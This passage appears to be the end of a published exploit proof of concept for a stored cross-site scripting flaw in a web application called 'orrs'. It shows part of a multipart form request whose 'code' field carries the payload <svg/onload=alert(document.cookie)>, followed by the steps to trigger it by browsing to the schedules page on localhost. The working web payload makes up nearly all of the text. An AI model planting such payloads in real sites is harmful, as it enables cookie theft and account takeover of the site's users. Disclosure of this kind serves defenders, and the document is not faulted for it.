/>-----------------------------271324269624375374252271437649<br />Content-Disposition: form-data; name="code"<br /><br /><svg/onload=alert(document.cookie)><br /><br />=====================================================================================================================================<br />To Trigger XSS (train code)<br />=====================================================================================================================================<br />Browse to http://localhost/orrs/?page=schedules<br /></code></pre>